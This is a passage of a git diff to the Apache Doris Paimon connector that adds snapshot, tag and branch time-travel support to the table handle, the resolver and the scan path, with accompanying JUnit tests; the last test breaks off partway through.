wiring deferred to a later batch (B5), and does not - * affect read-row correctness. + * dropped. As of B5 the connector emits {@code partition_columns} (see + * {@code PaimonConnectorMetadata.buildTableSchema}), so FE now treats Paimon tables as partitioned and + * the Nereids-pruned set feeds FE EXPLAIN ({@code partition=N/M}) and the generic scan node's + * pruned-empty short-circuit only — never {@code planScan}. For an explicit time-travel pin the + * connector deliberately reports an empty partition-item map and defers pruning to this predicate + * pushdown; {@code PluginDrivenScanNode.resolveRequiredPartitions} is guarded so that empty-universe + * pin scans-all rather than short-circuiting to zero splits. None of this affects read-row correctness. */ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { @@ -123,6 +126,25 @@ Table resolveTable(PaimonTableHandle paimonHandle) { } } + /** + * Resolves the live {@link Table} for the SCAN path and pins it to the handle's snapshot when + * the handle carries scan options (set by {@code applySnapshot}'s time-travel / MVCC pin). The + * pin is applied here (NOT in the metadata {@code resolveTable}) so BOTH the planned splits AND + * the JNI serialized-table read see the same pinned version, while schema/column/partition + * metadata reads keep resolving the latest table. + * + *

    {@code Table.copy(dynamicOptions)} layers the paimon scan options (e.g. + * {@code scan.snapshot-id}) over the resolved table — the same mechanism legacy paimon used. + */ + Table resolveScanTable(PaimonTableHandle paimonHandle) { + Table table = resolveTable(paimonHandle); + Map scanOptions = paimonHandle.getScanOptions(); + if (scanOptions != null && !scanOptions.isEmpty()) { + return table.copy(scanOptions); + } + return table; + } + @Override public List planScan( ConnectorSession session, @@ -131,7 +153,7 @@ public List planScan( Optional filter) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; - Table table = resolveTable(paimonHandle); + Table table = resolveScanTable(paimonHandle); // Build predicates from filter expression RowType rowType = table.rowType(); @@ -240,7 +262,7 @@ public Map getScanNodeProperties( Optional filter) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; - Table table = resolveTable(paimonHandle); + Table table = resolveScanTable(paimonHandle); Map props = new LinkedHashMap<>(); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java index 83f960b5e962e2..0d4738e211f538 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java @@ -22,7 +22,9 @@ import org.apache.paimon.table.Table; import java.util.Collections; +import java.util.HashMap; import java.util.List; +import java.util.Map; import java.util.Objects; /** @@ -33,11 +35,16 @@ * system handle {@link #sysTableName} is the bare sys-table name (no {@code "$"}) and * {@link #isSystemTable()} returns true; {@link #forceJni} carries the name-forced JNI hint * computed by {@link PaimonConnectorMetadata#getSysTableHandle}. This class is Java - * {@link java.io.Serializable} only (there is no GSON registration for it): {@link #sysTableName} - * and {@link #forceJni} are non-transient so they survive a Java serialization round-trip, while - * the resolved {@link Table} stays {@code transient} and is re-loaded (a sys handle via the 4-arg - * sys {@code Identifier}) when null. Normal handles keep {@code sysTableName == null} and - * {@code forceJni == false}. + * {@link java.io.Serializable} only (there is no GSON registration for it): {@link #sysTableName}, + * {@link #forceJni}, {@link #scanOptions} and {@link #branchName} are non-transient so they survive + * a Java serialization round-trip, while the resolved {@link Table} stays {@code transient} and is + * re-loaded (a sys handle via the 4-arg sys {@code Identifier}, a branch handle via the 3-arg branch + * {@code Identifier}) when null. Normal handles keep {@code sysTableName == null}, + * {@code forceJni == false} and {@code branchName == null}. + * + *

    {@link #scanOptions} carries paimon scan options (e.g. {@code {"scan.snapshot-id": "5"}}) for + * a time-travel / MVCC-pinned read. It is empty for a normal/sys handle; a pinned handle is built + * via {@link #withScanOptions(Map)} and the scan path applies it with {@code Table.copy(options)}. */ public class PaimonTableHandle implements ConnectorTableHandle { @@ -54,12 +61,30 @@ public class PaimonTableHandle implements ConnectorTableHandle { */ private final String sysTableName; + /** + * Branch name for a branch time-travel read ({@code @branch('name')}), or {@code null} for a + * normal/base handle. A branch is a DIFFERENT table identity than its base (independent schema + + * snapshots), so it is part of {@link #equals}/{@link #hashCode} (exactly like {@link + * #sysTableName}) and a non-null branch reloads via the 3-arg branch Identifier (see + * {@link PaimonTableResolver#resolve}). Serializable: a deserialized branch handle must still + * reload the branch table. Branch and sys are mutually exclusive in practice. + */ + private final String branchName; + /** * Name-forced JNI hint for system tables (legacy parity: true only for {@code binlog} / * {@code audit_log}). Always {@code false} for a normal handle. Serializable. */ private final boolean forceJni; + /** + * Paimon scan options for a time-travel / MVCC-pinned read (e.g. {@code scan.snapshot-id=5}). + * Empty for a normal/sys handle; populated only via {@link #withScanOptions(Map)} when the + * engine threads a pinned snapshot in. Serializable (survives the FE/BE round-trip) so the JNI + * serialized-table read pins to the same version as the planned splits. + */ + private final Map scanOptions; + /** Transient Paimon Table reference; not serialized. Set by PaimonConnectorMetadata. */ private transient Table paimonTable; @@ -70,17 +95,33 @@ public PaimonTableHandle(String databaseName, String tableName, /** * Full constructor including the system-table fields. Use - * {@link #forSystemTable(String, String, String, boolean)} to build a sys handle. + * {@link #forSystemTable(String, String, String, boolean)} to build a sys handle. scanOptions + * defaults to empty (a normal/sys handle is not snapshot-pinned). */ public PaimonTableHandle(String databaseName, String tableName, List partitionKeys, List primaryKeys, String sysTableName, boolean forceJni) { + this(databaseName, tableName, partitionKeys, primaryKeys, sysTableName, forceJni, + Collections.emptyMap(), null); + } + + private PaimonTableHandle(String databaseName, String tableName, + List partitionKeys, List primaryKeys, + String sysTableName, boolean forceJni, Map scanOptions, + String branchName) { this.databaseName = Objects.requireNonNull(databaseName, "databaseName"); this.tableName = Objects.requireNonNull(tableName, "tableName"); this.partitionKeys = partitionKeys; this.primaryKeys = primaryKeys; this.sysTableName = sysTableName; this.forceJni = forceJni; + this.branchName = branchName; + // Defensive immutable copy (codebase convention, cf. ConnectorPartitionInfo / + // ConnectorMvccSnapshot): the HashMap-backed unmodifiable map stays Serializable so the + // Java-serialization round-trip is preserved. + this.scanOptions = scanOptions == null + ? Collections.emptyMap() + : Collections.unmodifiableMap(new HashMap<>(scanOptions)); } /** @@ -120,11 +161,51 @@ public boolean isSystemTable() { return sysTableName != null; } + /** Branch name for a branch time-travel read, or {@code null} for a normal/base handle. */ + public String getBranchName() { + return branchName; + } + /** Name-forced JNI hint (true only for {@code binlog} / {@code audit_log} sys tables). */ public boolean isForceJni() { return forceJni; } + /** Paimon scan options for a pinned read (empty for a normal/sys handle). */ + public Map getScanOptions() { + return scanOptions; + } + + /** + * Returns a NEW handle identical to this one (db/table/partitionKeys/primaryKeys/sysTableName/ + * forceJni/branchName and the transient {@link Table} are preserved) but carrying the given + * scanOptions — the snapshot-pinned read variant. The transient Table is copied over as-is; the + * scan path applies {@code Table.copy(scanOptions)} at resolution time. branchName is preserved + * because it is part of the handle identity. + */ + public PaimonTableHandle withScanOptions(Map options) { + PaimonTableHandle copy = new PaimonTableHandle(databaseName, tableName, + partitionKeys, primaryKeys, sysTableName, forceJni, options, branchName); + copy.paimonTable = this.paimonTable; + return copy; + } + + /** + * Returns a NEW handle identical to this one (db/table/partitionKeys/primaryKeys/sysTableName/ + * forceJni/scanOptions preserved) but carrying the given {@code branchName} — the branch + * time-travel read variant. + * + *

    CRITICAL: unlike {@link #withScanOptions(Map)}, this does NOT copy the transient + * {@link Table} over. A branch is a DIFFERENT table (independent schema + snapshots), so the + * transient reference is left {@code null} and {@link PaimonTableResolver#resolve} reloads the + * BRANCH table via the 3-arg branch Identifier. Copying the base Table over would make the + * branch read return the BASE table's rows — a silent data error. + */ + public PaimonTableHandle withBranch(String branchName) { + return new PaimonTableHandle(databaseName, tableName, + partitionKeys, primaryKeys, sysTableName, forceJni, scanOptions, branchName); + } + /** Returns the transient Paimon Table reference, or null if not set. */ public Table getPaimonTable() { return paimonTable; @@ -144,21 +225,26 @@ public boolean equals(Object o) { return false; } PaimonTableHandle that = (PaimonTableHandle) o; - // sysTableName is part of identity so a sys handle (db.table$snapshots) never equals its - // base handle (db.table) — they are distinct tables to the engine. + // sysTableName AND branchName are part of identity: a sys handle (db.table$snapshots) never + // equals its base handle (db.table), and a branch handle (db.table@branch) never equals its + // base — all are distinct tables to the engine (independent schema/snapshots). scanOptions is + // intentionally NOT part of identity: a snapshot-pinned handle is the SAME table, just read + // at a version, so it must equal/hash identically to its base handle. return databaseName.equals(that.databaseName) && tableName.equals(that.tableName) - && Objects.equals(sysTableName, that.sysTableName); + && Objects.equals(sysTableName, that.sysTableName) + && Objects.equals(branchName, that.branchName); } @Override public int hashCode() { - return Objects.hash(databaseName, tableName, sysTableName); + return Objects.hash(databaseName, tableName, sysTableName, branchName); } @Override public String toString() { - return sysTableName == null + String base = sysTableName == null ? databaseName + "." + tableName : databaseName + "." + tableName + "$" + sysTableName; + return branchName == null ? base : base + "@" + branchName; } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java index 3506f95a6478c6..39cf9d9575b3d2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java @@ -33,7 +33,10 @@ *

    Contract: prefer the handle's transient {@link Table}; on null reload from the catalog seam — * a {@linkplain PaimonTableHandle#isSystemTable() system handle} via the 4-arg sys * {@link Identifier} {@code (db, table, "main", sysName)} (so the SYSTEM table is re-fetched, not - * the base table), a normal handle via the 2-arg {@code Identifier.create(db, table)}. + * the base table), a {@linkplain PaimonTableHandle#getBranchName() branch handle} via the 3-arg + * branch {@link Identifier} {@code (db, table, branch)} (so the BRANCH table — independent schema + + * snapshots — is fetched, not the base table), a normal handle via the 2-arg + * {@code Identifier.create(db, table)}. * *

    NOTE: this resolver only picks the correct (sys) Table on reload. It does NOT do * {@code forceJni} native-vs-JNI routing or fail-loud guards — those remain T19. @@ -47,7 +50,8 @@ private PaimonTableResolver() { * Returns the handle's transient Paimon {@link Table}, or reloads it from {@code catalogOps} * when the transient reference is null (e.g. after a serialization round-trip across the FE/BE * boundary or plan reuse). A system handle reloads via the 4-arg sys {@link Identifier}; a - * normal handle via the 2-arg base {@link Identifier}. + * branch handle via the 3-arg branch {@link Identifier}; a normal handle via the 2-arg base + * {@link Identifier}. * *

    This method does NOT wrap the reload failure: each call site keeps its own * exception-handling/wrapping. The only checked surface is the seam's @@ -63,11 +67,21 @@ static Table resolve(PaimonCatalogOps catalogOps, PaimonTableHandle handle) return table; } // Fallback reload. A sys handle MUST reload via the 4-arg sys Identifier so the SYSTEM - // table is re-fetched, not the base table. - Identifier id = handle.isSystemTable() - ? new Identifier(handle.getDatabaseName(), handle.getTableName(), - "main", handle.getSysTableName()) - : Identifier.create(handle.getDatabaseName(), handle.getTableName()); + // table is re-fetched, not the base table. A branch handle MUST reload via the 3-arg branch + // Identifier so the BRANCH table (independent schema/snapshots) is fetched, not the base. + Identifier id; + if (handle.isSystemTable()) { + id = new Identifier(handle.getDatabaseName(), handle.getTableName(), + "main", handle.getSysTableName()); + } else if (handle.getBranchName() != null) { + // A branch read loads a DIFFERENT table (independent schema/snapshots) via the 3-arg + // branch Identifier, mirroring legacy + // PaimonExternalCatalog.getPaimonTable(mapping, branch, null). + id = new Identifier(handle.getDatabaseName(), handle.getTableName(), + handle.getBranchName()); + } else { + id = Identifier.create(handle.getDatabaseName(), handle.getTableName()); + } return catalogOps.getTable(id); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java index 6ece0251d35689..69ec7bf0415870 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java @@ -60,6 +60,15 @@ final class FakePaimonTable implements Table { private final List primaryKeys; private Map options = Collections.emptyMap(); + /** + * The dynamic options passed to the most recent {@link #copy(Map)} call, or {@code null} if + * {@code copy} was never invoked. Lets the scan tests assert the snapshot pin was applied via + * {@code Table.copy(scanOptions)} rather than scanning the un-pinned table. + */ + Map lastCopyOptions; + /** The table returned by {@link #copy(Map)}; defaults to {@code this} when unset. */ + Table copyResult; + FakePaimonTable(String name, RowType rowType, List partitionKeys, List primaryKeys) { this.name = name; @@ -117,7 +126,11 @@ public FileIO fileIO() { @Override public Table copy(Map dynamicOptions) { - throw new UnsupportedOperationException(); + // Records the scan-pin options the scan path layers on via Table.copy(scanOptions). Returns + // a configurable result table (defaults to this) so the test can prove the COPIED table — + // not the un-pinned original — is what gets planned/serialized. + this.lastCopyOptions = dynamicOptions; + return copyResult != null ? copyResult : this; } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java index bfceae03439470..8826745934a2b3 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java @@ -18,28 +18,42 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.api.ConnectorCapability; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.DorisConnectorException; import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.paimon.CoreOptions; +import org.apache.paimon.types.DataField; import org.apache.paimon.types.DataTypes; import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.DateTimeUtils; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.util.Arrays; import java.util.Collections; +import java.util.List; +import java.util.Map; import java.util.OptionalLong; import java.util.Set; +import java.util.TimeZone; /** - * Tests for the paimon E5 MVCC / time-travel SPI methods (P5-T20): - * {@code beginQuerySnapshot}, {@code getSnapshotById}, {@code getSnapshotAt}, plus the - * {@code PaimonConnector.getCapabilities()} declaration. + * Tests for the paimon E5 MVCC / time-travel SPI methods: + * {@code beginQuerySnapshot}, {@code resolveTimeTravel} (SNAPSHOT_ID / TIMESTAMP / TAG, B5b-2a; + * INCREMENTAL/@incr, B5b-2b; BRANCH, B5b-2c), {@code getTableSchema(snapshot)} (schema-at-snapshot, + * including branch-aware), {@code applySnapshot} (including the branch sentinel routing), plus the + * {@code PaimonConnector.getCapabilities()} declaration. The @incr window VALIDATION rules themselves + * live in {@link PaimonIncrementalScanParamsTest}. * - *

    These drive a {@link RecordingPaimonCatalogOps} fake whose three MVCC seam methods - * ({@code latestSnapshotId}, {@code snapshotIdAtOrBefore}, {@code snapshotExists}) return plain - * {@code long}s / {@code boolean}s, so the metadata layer's LOGIC (sys-guard, empty-table->-1, - * found/empty mapping) is exercised entirely offline — no real paimon {@code Snapshot} / - * {@code SnapshotManager} is faked (those are impractical to construct without a live table). + *

    These drive a {@link RecordingPaimonCatalogOps} fake whose MVCC seam methods return plain + * {@code long}s / small structs (never a real {@code Snapshot}/{@code Tag}/{@code TableSchema}), so + * the metadata layer's LOGIC (sys-guard, empty->-1, found/empty mapping, schemaId stamping, + * tag-name pinning, TZ-aware timestamp parse) is exercised entirely offline. */ public class PaimonConnectorMetadataMvccTest { @@ -55,6 +69,55 @@ private static RowType rowType(String... columnNames) { return builder.build(); } + /** Minimal {@link ConnectorSession} that only carries a time zone id (for the TIMESTAMP parse). */ + private static final class TzSession implements ConnectorSession { + private final String timeZone; + + TzSession(String timeZone) { + this.timeZone = timeZone; + } + + @Override + public String getQueryId() { + return "q"; + } + + @Override + public String getUser() { + return "u"; + } + + @Override + public String getTimeZone() { + return timeZone; + } + + @Override + public String getLocale() { + return "en_US"; + } + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public String getCatalogName() { + return "c"; + } + + @Override + public T getProperty(String name, Class type) { + return null; + } + + @Override + public Map getCatalogProperties() { + return Collections.emptyMap(); + } + } + /** A normal (non-system) handle with its transient Table already set (no reload needed). */ private static PaimonTableHandle normalHandle(RecordingPaimonCatalogOps ops) { PaimonTableHandle handle = new PaimonTableHandle( @@ -133,91 +196,759 @@ public void beginQuerySnapshotSysHandleReturnsEmpty() { "a sys handle must short-circuit before touching the MVCC seam"); } - // ==================== getSnapshotById ==================== + // ==================== resolveTimeTravel: SNAPSHOT_ID ==================== @Test - public void getSnapshotByIdExistsReturnsSnapshot() { + public void resolveSnapshotIdExistsPinsIdSchemaAndScanOption() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); PaimonTableHandle handle = normalHandle(ops); ops.snapshotExists = true; - - ConnectorMvccSnapshot snap = metadataWith(ops).getSnapshotById(null, handle, 99L).get(); - - // WHY: time-travel-by-id must echo the requested id when that snapshot exists. MUTATION: - // returning empty even when the snapshot exists -> .get() throws -> red. - Assertions.assertEquals(99L, snap.getSnapshotId(), - "an existing snapshot id must be pinned verbatim"); + ops.snapshotSchemaId = OptionalLong.of(3L); + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.snapshotId("99")).get(); + + // WHY: FOR VERSION AS OF must pin the parsed id, stamp the snapshot's schemaId (so + // schema-at-snapshot reads pick the historical schema), and emit the scan.snapshot-id option + // the scan path copies onto the table. MUTATION: dropping the schemaId stamp -> -1 != 3 red; + // wrong/missing scan option -> red; not parsing the string id -> red. + Assertions.assertEquals(99L, snap.getSnapshotId(), "the parsed snapshot id must be pinned"); + Assertions.assertEquals(3L, snap.getSchemaId(), + "the snapshot's schemaId must be stamped for schema-at-snapshot"); + Assertions.assertEquals("99", snap.getProperties().get("scan.snapshot-id"), + "scan.snapshot-id must be pinned to the resolved id"); } @Test - public void getSnapshotByIdNotExistsReturnsEmpty() { + public void resolveSnapshotIdNotExistsReturnsEmpty() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); PaimonTableHandle handle = normalHandle(ops); ops.snapshotExists = false; // SDK FileNotFoundException -> seam reports false - // WHY: the SPI contract is "or empty if none" (ConnectorMetadata.getSnapshotById Javadoc), so - // a missing id must degrade to Optional.empty(), NOT throw. (Legacy THREW a UserException; - // surfacing the user-facing "not found" message is now the B5 fe-core consumer's job — a - // documented, intentional contract difference.) MUTATION: throwing / returning a non-empty - // snapshot for a missing id -> isPresent() true -> red. - Assertions.assertFalse(metadataWith(ops).getSnapshotById(null, handle, 99L).isPresent(), - "a missing snapshot id must yield Optional.empty (SPI empty-if-none)"); + // WHY: a missing id must degrade to Optional.empty (SPI empty-if-none); the B5b-3 fe-core + // consumer translates empty into the legacy "can't find snapshot by id" UserException. + // MUTATION: returning a non-empty snapshot for a missing id -> isPresent() true -> red. + Assertions.assertFalse(metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.snapshotId("99")).isPresent(), + "a missing snapshot id must yield Optional.empty"); } @Test - public void getSnapshotByIdSysHandleReturnsEmpty() { + public void resolveSysHandleNeverTimeTravels() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); PaimonTableHandle handle = sysHandle(ops); ops.snapshotExists = true; // would yield a snapshot if the guard were missing - Assertions.assertFalse(metadataWith(ops).getSnapshotById(null, handle, 5L).isPresent(), - "a system table must NOT expose time-travel-by-id"); - // MUTATION: dropping the isSystemTable() guard -> snapshotExists=true yields a snapshot -> - // red; the empty log also proves the guard short-circuits before the seam. + Assertions.assertFalse(metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.snapshotId("5")).isPresent(), + "a system table must NOT expose time-travel"); + // WHY/MUTATION: dropping the isSystemTable() guard -> the seam runs -> non-empty -> red; the + // empty log also proves the guard short-circuits before touching the seam. Assertions.assertTrue(ops.log.isEmpty(), "a sys handle must short-circuit before touching the MVCC seam"); } - // ==================== getSnapshotAt ==================== + // ==================== resolveTimeTravel: TIMESTAMP ==================== @Test - public void getSnapshotAtFoundReturnsSnapshotId() { + public void resolveTimestampDigitalParsesMillisVerbatim() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); PaimonTableHandle handle = normalHandle(ops); ops.snapshotIdAtOrBefore = OptionalLong.of(17L); + ops.snapshotSchemaId = OptionalLong.of(2L); - ConnectorMvccSnapshot snap = metadataWith(ops).getSnapshotAt(null, handle, 1_000L).get(); + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.timestamp("1700000000000", true)) + .get(); - // WHY: time-travel-by-timestamp must pin the id of the latest snapshot at-or-before the - // wall-clock time (legacy earlierOrEqualTimeMills). MUTATION: returning the timestamp instead - // of the resolved snapshot id, or empty -> id != 17 / .get() throws -> red. + // WHY: a DIGITAL timestamp is epoch-millis (legacy Long.parseLong), fed straight to the + // at-or-before lookup. MUTATION: re-parsing the digits as a datetime string / not feeding the + // verbatim millis -> the captured arg != 1700000000000 -> red. + Assertions.assertEquals(1_700_000_000_000L, ops.snapshotIdAtOrBeforeArg, + "a digital timestamp must be fed to the at-or-before lookup as raw epoch-millis"); Assertions.assertEquals(17L, snap.getSnapshotId(), - "the timestamp must resolve to the at-or-before snapshot's id"); + "the at-or-before snapshot id must be pinned"); + Assertions.assertEquals(2L, snap.getSchemaId(), "the snapshot's schemaId must be stamped"); + Assertions.assertEquals("17", snap.getProperties().get("scan.snapshot-id"), + "scan.snapshot-id must be pinned to the resolved id"); + } + + @Test + public void resolveTimestampStringParsedWithSessionTimeZone() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotIdAtOrBefore = OptionalLong.of(8L); + + String literal = "2023-11-15 00:00:00"; + // Expected millis = exactly what paimon's DateTimeUtils computes for THIS literal in THIS zone + // (the byte-parity reference: legacy parsed the same way with TimeUtils.getTimeZone()). + long expectedShanghai = DateTimeUtils.parseTimestampData(literal, 3, + TimeZone.getTimeZone("Asia/Shanghai")).getMillisecond(); + long expectedUtc = DateTimeUtils.parseTimestampData(literal, 3, + TimeZone.getTimeZone("UTC")).getMillisecond(); + // Guard the test itself: the two zones must differ, else the assertion below proves nothing. + Assertions.assertNotEquals(expectedShanghai, expectedUtc, + "test precondition: the literal must resolve to different millis in the two zones"); + + metadataWith(ops).resolveTimeTravel(new TzSession("Asia/Shanghai"), handle, + ConnectorTimeTravelSpec.timestamp(literal, false)); + + // WHY: a non-digital timestamp must be parsed with the SESSION time zone (byte-parity with + // legacy PaimonUtil.getPaimonSnapshotByTimestamp's TimeUtils.getTimeZone()), NOT a fixed UTC. + // MUTATION: parsing with a hardcoded UTC (or the JVM default) -> the captured millis equals + // expectedUtc, not expectedShanghai -> red. + Assertions.assertEquals(expectedShanghai, ops.snapshotIdAtOrBeforeArg, + "a string timestamp must be parsed with the session time zone, not UTC"); } @Test - public void getSnapshotAtNoneReturnsEmpty() { + public void resolveTimestampStringWithUnsupportedZoneAliasThrowsClearError() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + + // WHY (parity landmine): Doris accepts session zone aliases like "CST"/"PST"/"EST" that + // java.time.ZoneId.of() REJECTS (ZoneRulesException, a DateTimeException). Legacy resolved + // these via the fe-core Doris alias map and succeeded; the connector is import-gated out of + // that map. A SILENT fallback (e.g. UTC) would resolve the WRONG snapshot -> silently wrong + // rows, so the connector must FAIL LOUD with an actionable error instead. + // MUTATION: removing the catch -> a raw ZoneRulesException propagates (assertThrows on the + // wrong type) red; degrading to UTC instead of throwing -> assertThrows finds no exception red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadataWith(ops).resolveTimeTravel(new TzSession("CST"), handle, + ConnectorTimeTravelSpec.timestamp("2023-01-01 00:00:00", false)), + "an unsupported Doris zone alias must fail loud, not crash with a raw " + + "ZoneRulesException nor silently degrade to a wrong zone"); + Assertions.assertTrue(ex.getMessage().contains("CST"), + "the error must name the offending session zone alias ('CST')"); + Assertions.assertTrue(ex.getMessage().contains("standard") + && ex.getMessage().contains("zone id"), + "the error must give actionable guidance (use a standard zone id)"); + } + + @Test + public void resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotIdAtOrBefore = OptionalLong.of(11L); + + // WHY: the zone-id catch must be scoped to the STRING path only. A DIGITAL timestamp is raw + // epoch-millis and never touches ZoneId.of, so it must succeed even under a CST session that + // would reject a datetime string. MUTATION: over-broadening the catch to the whole parse (or + // resolving the zone unconditionally) -> the digital path throws under "CST" -> red. + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(new TzSession("CST"), handle, + ConnectorTimeTravelSpec.timestamp("1700000000000", true)) + .get(); + + Assertions.assertEquals(1_700_000_000_000L, ops.snapshotIdAtOrBeforeArg, + "a digital timestamp must be fed verbatim even under an unsupported zone alias"); + Assertions.assertEquals(11L, snap.getSnapshotId(), + "the digital timestamp path must resolve normally under a CST session (no zone needed)"); + } + + @Test + public void resolveTimestampNoneAtOrBeforeReturnsEmpty() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); PaimonTableHandle handle = normalHandle(ops); ops.snapshotIdAtOrBefore = OptionalLong.empty(); // no snapshot <= ts (SDK returned null) - // WHY: when no snapshot is at-or-before the timestamp the SPI contract is empty-if-none (same - // documented difference vs legacy, which threw with the earliest-snapshot hint). MUTATION: - // throwing / returning a snapshot for the no-match case -> isPresent() true -> red. - Assertions.assertFalse(metadataWith(ops).getSnapshotAt(null, handle, 1_000L).isPresent(), + // WHY: no snapshot at-or-before the timestamp must degrade to Optional.empty (empty-if-none; + // the fe-core consumer surfaces the legacy earliest-snapshot-hint error). MUTATION: returning + // a snapshot for the no-match case -> isPresent() true -> red. + Assertions.assertFalse(metadataWith(ops).resolveTimeTravel(null, handle, + ConnectorTimeTravelSpec.timestamp("1700000000000", true)).isPresent(), "no snapshot at-or-before the timestamp must yield Optional.empty"); } + // ==================== resolveTimeTravel: TAG ==================== + @Test - public void getSnapshotAtSysHandleReturnsEmpty() { + public void resolveTagFoundPinsTagNameNotId() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); - PaimonTableHandle handle = sysHandle(ops); - ops.snapshotIdAtOrBefore = OptionalLong.of(3L); + PaimonTableHandle handle = normalHandle(ops); + ops.tagSnapshot = new PaimonCatalogOps.TagSnapshot(42L, 4L); + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.tag("release-1")).get(); + + // WHY: tag time-travel must pin the tag's snapshot id + schema id, but the SCAN OPTION must be + // scan.tag-name = the NAME (legacy PaimonExternalTable.java:137 pins the name, not the id, so a + // later move of the tag is honored). MUTATION: pinning scan.snapshot-id (the id) instead of + // scan.tag-name -> the tag-name assertion red; not stamping schemaId -> -1 != 4 red. + Assertions.assertEquals(42L, snap.getSnapshotId(), "the tag's snapshot id must be pinned"); + Assertions.assertEquals(4L, snap.getSchemaId(), "the tag's schemaId must be stamped"); + Assertions.assertEquals("release-1", snap.getProperties().get("scan.tag-name"), + "tag time-travel must pin scan.tag-name to the tag NAME (not the snapshot id)"); + Assertions.assertNull(snap.getProperties().get("scan.snapshot-id"), + "tag time-travel must NOT pin scan.snapshot-id"); + } - Assertions.assertFalse(metadataWith(ops).getSnapshotAt(null, handle, 1_000L).isPresent(), - "a system table must NOT expose time-travel-by-timestamp"); + @Test + public void resolveTagNotFoundReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.tagSnapshot = null; // no such tag + + // WHY: a missing tag must degrade to Optional.empty (legacy threw "can't find snapshot by + // tag"; the fe-core consumer now surfaces that). MUTATION: returning a snapshot for an absent + // tag -> isPresent() true -> red. + Assertions.assertFalse(metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.tag("missing")).isPresent(), + "a missing tag must yield Optional.empty"); + } + + // ==================== resolveTimeTravel: BRANCH ==================== + + @Test + public void resolveBranchFoundLoadsBranchTableAndPinsItsLatestSnapshot() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); // base table is ops.table + ops.branchExists = true; + // The branch is a DIFFERENT table double than the base, with its own latest snapshot/schema. + FakePaimonTable branch = new FakePaimonTable( + "t1", rowType("id", "dt"), Collections.emptyList(), Collections.emptyList()); + ops.branchTable = branch; + ops.latestSnapshotId = OptionalLong.of(7L); + ops.snapshotSchemaId = OptionalLong.of(3L); + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.branch("b1")).get(); + + // WHY: @branch must pin the BRANCH's LATEST snapshot + its schemaId, carry the branch identity + // via the CoreOptions.BRANCH sentinel (NOT scan.snapshot-id — the branch reads its own latest), + // and validate the branch on the BASE table. Branches have no in-branch time-travel (legacy + // reads the branch's latestSnapshot() only). 